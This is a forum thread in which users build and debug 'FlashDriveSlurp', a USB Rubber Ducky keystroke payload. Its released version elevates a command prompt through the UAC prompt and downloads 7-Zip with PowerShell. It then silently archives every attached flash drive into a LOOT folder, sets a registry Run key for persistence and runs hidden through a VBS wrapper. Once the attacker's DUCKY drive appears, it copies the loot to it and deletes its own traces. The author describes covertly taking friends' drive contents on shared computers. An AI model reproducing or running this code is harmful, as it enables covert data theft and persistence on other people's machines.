Jump to content

Recommended Posts

Posted (edited)

Hi all, been a while since I posted last. Am working on another batch payload that searches for flash drives on a system, and then 7zip's them to a location on the machine. Not sure how I am going to exfiltrate the data, could be a flash drive, or use some other tool that can command line email. The following lines of code can be copied and paisted directly into the command prompt, just watch out for formatting issues, sometimes when copying and pasting the computer adds newlines where there shouldn't be any.


REM *** Make the destination we are 7Zipping to. ***
set destination=%TEMP%\LOOT\%COMPUTERNAME%
mkdir %destination%

REM *** Get the attached flash drives letters and drive name's. ***
REM *** setlocal EnableDelayedExpansion may need replaced with cmd /V:ON . ***
setlocal EnableDelayedExpansion
set letters= 
set drivename= 

REM *** Check for removable drives, that are healthy, omitting the ducky drive. ***
for /f "tokens=3,4 delims= " %A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %A & set drivename=!drivename! %B)

echo %letters%
echo %drivename%

REM *** 7zip the found flash drives. ***

The biggest problem now will be reading those two lists pairwise, and sending the drive letters and drive names to the 7zip application. I may have to re-work a few things, and use batch "arrays" in the final product instead of using spaces to separate list elements. I plan on sending this all to some sort of batch file, and having it run every minute or so until an exfiltration flash drive is plugged in. Help is always welcome.

This may all seem kind of useless, but I have seen plenty of computers which everybody logs into the same account, and you can still dump scripts to them.

Edited by overwraith
Posted (edited)

Latest Update, getting closer to an actual payload. Eventually this will be able to either knowingly, or unknowingly 'backup' all your friend's flash drives.

REM *** Make the destination we are 7zipping to. ***
set destination=%TEMP%\LOOT\%COMPUTERNAME%
mkdir %destination%

REM *** Get the attached flash drives letters and drive name's. ***
REM *** setlocal EnableDelayedExpansion may need replaced with cmd /V:ON . ***
setlocal EnableDelayedExpansion

set letters= 
set drivename= 

REM *** Check for removable drives, that are healthy, omitting the ducky drive. ***
for /f "tokens=3,4 delims= " %A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %A & set drivename=!drivename! %B)

echo %letters%
echo %drivename%

REM *** 7zip the found flash drives. ***

set i=0
for %a in (%letters%) do set /A i+=1 & set letters[!i!]=%a
set i=0
for %a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%a
REM *** Set number to length of the array. ***
set n=%i%

REM for /L %i in (1,1,%n%) do echo !letters[%i]! and !drivename[%i]!
for /L %i in (1,1,%n%) do 7z a -t7z %destination%\!drivename[%i]!.7z !letters[%i]!:\*

Got this to work using someone else's code here:

http://stackoverflow.com/questions/8039128/batch-script-in-dos-traverse-multiple-lists-pairwise

Again, this is not a batch file yet, just copy and paste into the command prompt. Command prompt can handle multiple lines ok.

Also, I believe that 7zip has a command line install option.

Takes a pretty long time to zip, may need to use another algorithm, not zip, or zip to another location and have yet another batch process managing the zipping of files from the first C drive location.

Edited by overwraith
Posted (edited)

I was working on this a bit yesterday and this morning. I came up with a way of finding all "removable drives" and collected drive letters.

List drives:

@ECHO OFF

for %%1 in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do ( 
     fsutil fsinfo drivetype %%1: |FIND /V "Directory")

I could use Listdrives.bat | Findstr "Removable" > test.txt and it would display the removable drives with an output.

Remove the extra information in the txt file with another batch file:

@Echo OFF

(For /F "Usebackq Tokens=*" %%# in ("test.txt") Do (
    Echo "%%#" | FIND /I " - Removable Drive" 1>NUL && (
        Set "Line=%%#"
        Call Set "Line=%%Line:~0,-18%%"
        Call Echo %%Line%%
    ) || (
        Echo %%#
    )
))>"MyNewFile.txt"

Pause&Exit

From here you can have each drive as its own variable with

< MyNewFile.txt (
set /p line1=
set /p line2=
set /p line3=
)

Your way looks much cleaner hahaha.

Edited by th3l0b3
Posted (edited)

I am happy to hear that somebody is interested in this new payload. I will probably base the full payload either on that generic batch payload I wrote, or the duck slurp payload. Stay tuned for more stuff.

...

Here is a payload I am troubleshooting. There seems to be an error in the logic, the script appears to stop working if the "DUCKY" drive is not plugged in. When I restart the script after the drive has been plugged in the script will then continue semi-normal execution by zipping drives to the destination, but it does not xcopy the results to the "DUCKY" exfiltration drive. Here is the problem code payload.

REM Author: overwraith
REM Name: FlashDriveSlurp.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration. 
REM Encoder V2.4+

REM *** Initial Delay *** 
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Change directories because System32 appears to be protected. ***
REM Navigate to %TEMP% location first, as a default directory. 
STRING CD %TEMP%
ENTER
REM Ideally we will navigate to this location if it is not locked down. 
STRING CD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING mkdir %destination%
ENTER
STRING :while1
ENTER
REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if [%DUCKYdrive%] EQU [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
REM *** Get the attached flash drives letters and drive name's. ***
STRING set letters= 
ENTER
STRING set drivename= 
ENTER
STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
ENTER 
REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array. 
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1 
ENTER
STRING :break
ENTER
STRING xcopy %destination% %DUCKYdrive%
ENTER
REM *** Terminate execution after copying to ducky drive. ***
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER

Here is the resulting batch file:

@ECHO OFF
setlocal EnableDelayedExpansion
set destination=%TEMP%\LOOT\%COMPUTERNAME%
mkdir %destination%
:while1
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
if [%DUCKYdrive%] EQU [] (
goto :break
)
set letters=
set drivename=
for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
set i=0
for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
set i=0
for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
set n=%i%
for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
timeout /t 30
goto :while1
:break
xcopy %destination% %DUCKYdrive%

Similarly to the DuckySlurp payload, this one will work best with a high speed high volume removable drive labeled "DUCKY". For testing purposes however use whatever small flash drive you want.

Edited by overwraith
Posted (edited)

Fixed some of the bugs. Still need to install 7zip with duckscript.

REM Author: overwraith
REM Name: FlashDriveSlurp.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration.
REM Encoder V2.4+

REM *** Initial Delay ***
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base.
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Change directories because System32 appears to be protected. ***
REM Navigate to %TEMP% location first, as a default directory.
STRING CD %TEMP%
ENTER
REM Ideally we will navigate to this location if it is not locked down.
STRING CD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING mkdir %destination%
ENTER
STRING :while1
ENTER
REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A)
ENTER
STRING if [%DUCKYdrive%] NEQ [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
REM *** Get the attached flash drives letters and drive name's. ***
STRING set letters=
ENTER
STRING set drivename=
ENTER
STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
ENTER
REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array.
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM *** Copy to the ducky drive. ***
STRING xcopy %destination%\* %DUCKYdrive%:\LOOT\%COMPUTERNAME% /I
ENTER
REM *** Terminate execution, clean up after script. ***
STRING erase /Q *.7z
ENTER
STRING rmdir /S /Q %TEMP%\LOOT
ENTER
STRING erase invis.vbs
ENTER
STRING erase /Q %0
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER
Edited by overwraith
Posted

I have been trying to get the powershell download and execute script working with this modified silent install procedure. Can anybody see why the powershell window is erroring when this is entered?

DELAY 3000
GUI r
DELAY 100 
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7z920.exe','%TEMP%\7z920.exe');
DELAY 100
STRING Start-Process "%TEMP%\7z920.exe /S /D=%PROGRAMFILES%\7-Zip\"
ENTER

The webpage I am getting the 7zip links from is here:

http://www.7-zip.org/download.html

Posted (edited)

No reason, I guess the command line installer would be better. I will see if that fixes the error.

...

It appears that the 7za file on 7zip/sourceforge's site is zipped. This could get messy.

I still don't know how we are supposed to send command line arguments to executables in the powershell code, don't know much powershell.

Edited by overwraith
Posted

Now have some code for unzipping in powershell:

$shell = new-object -com shell.application
$zip = $shell.NameSpace(“%temp%\7za920.zip”)
foreach($item in $zip.items())
{
$shell.Namespace(“%temp%”).copyhere($item)
}

Must be run through the GUI+R run window, so %TEMP% is replaced with the file path.
The following code runs fine, and unzips the zip file.

powershell -noexit $shell = new-object -com shell.application; $zip = $shell.NameSpace(“%temp%\7za920.zip”); foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) }

When I glue this command to the end of the powershell download command, bad stuff happens.

powershell -noexit (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip');$shell = new-object -com shell.application; $zip = $shell.NameSpace(“%temp%\7za920.zip”); foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) }

The following is the error that shows up:

The string is missing the terminator: ".
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordEx
   ception
    + FullyQualifiedErrorId : TerminatorExpectedAtEndOfString

I got this code for unzipping at the following location:

http://www.howtogeek.com/tips/how-to-extract-zip-files-using-powershell/

Posted (edited)

Not sure why it works, but these powershell commands can be typed into a command window, and they work. Not getting the errors that I was getting in the run box. The run box might have a character limit, or something.

I am also going to have to tweak the script to use registry keys instead of using the "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" folder I was using, because without the registry key it will not start up silently.

Edited by overwraith
Posted (edited)

This appears to function correctly, I think this is as good a version as any to call a "release version".

REM Author: overwraith
REM Name: FlashDriveSlurp.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration. 
REM Encoder V2.4+

REM *** Initial Delay *** 
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER

REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER

REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
REM *** Registry key that restarts script on reboot. ***
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\FlashDriveSlurp.bat" /f
ENTER
REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING mkdir %destination%
ENTER
STRING :while1
ENTER
REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A)
ENTER
STRING if [%DUCKYdrive%] NEQ [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
REM *** Get the attached flash drives letters and drive name's. ***
STRING set letters= 
ENTER
STRING set drivename= 
ENTER
STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
ENTER 
REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array. 
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1 
ENTER
STRING :break
ENTER
REM *** Copy to the ducky drive. ***
STRING xcopy %destination%\* %DUCKYdrive%:\LOOT\%COMPUTERNAME% /I
ENTER
REM *** Terminate execution, clean up after script. ***
STRING erase /Q *.7z
ENTER
STRING rmdir /S /Q %TEMP%\LOOT
ENTER
STRING erase invis.vbs
ENTER
STRING erase /Q %0
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER
STRING EXIT
ENTER
Edited by overwraith

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...